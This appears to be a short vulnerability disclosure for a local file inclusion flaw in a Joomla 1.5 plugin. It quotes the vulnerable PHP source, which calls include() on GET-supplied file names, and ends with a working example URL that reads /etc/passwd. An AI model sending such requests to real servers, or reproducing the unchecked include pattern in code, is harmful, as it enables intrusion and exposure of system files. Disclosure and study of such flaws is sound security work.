42 lines
No EOL
1.4 KiB
Text
42 lines
No EOL
1.4 KiB
Text
# Exploit Title: Core Design Scriptegrator plugin for Joomla! 1.5 file inclusion
|
|
# Author: S2 Crew [Hungary]
|
|
# Tested on: Debian Linux, Apache, Joomla! 1.5
|
|
|
|
# Code:
|
|
|
|
There's a file called jsloader.php which takes an array of file names
|
|
from the HTTP GET parameters and calls include() on every one of them.
|
|
|
|
-----------------8<-----------------------------------------------
|
|
<?php
|
|
/**
|
|
* Core Design Scriptegrator plugin for Joomla! 1.5
|
|
*/
|
|
|
|
define('DS', DIRECTORY_SEPARATOR);
|
|
$dir = dirname(__FILE__);
|
|
|
|
$files = array();
|
|
if (isset($_GET['files']) && $_GET['files']) $files = $_GET['files'];
|
|
|
|
if (extension_loaded('zlib') && !ini_get('zlib.output_compression')) @ob_start('ob_gzhandler');
|
|
|
|
header("Content-type: application/x-javascript");
|
|
header('Cache-Control: must-revalidate');
|
|
header('Expires: ' . gmdate('D, d M Y H:i:s', time() + 86400) . ' GMT');
|
|
|
|
foreach ($files as $file) {
|
|
if (is_file($file)) {
|
|
include($file);
|
|
echo "\n";
|
|
}
|
|
}
|
|
?>
|
|
-----------------8<-----------------------------------------------
|
|
|
|
The problem is that the only protection is the is_file() call (therefore it cannot
|
|
be used for remote file inclusion), so it's trivial to exploit this vulnerability to
|
|
execute the PHP interpreter on any file on the target system the httpd user can read.
|
|
|
|
Example:
|
|
http://server/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd |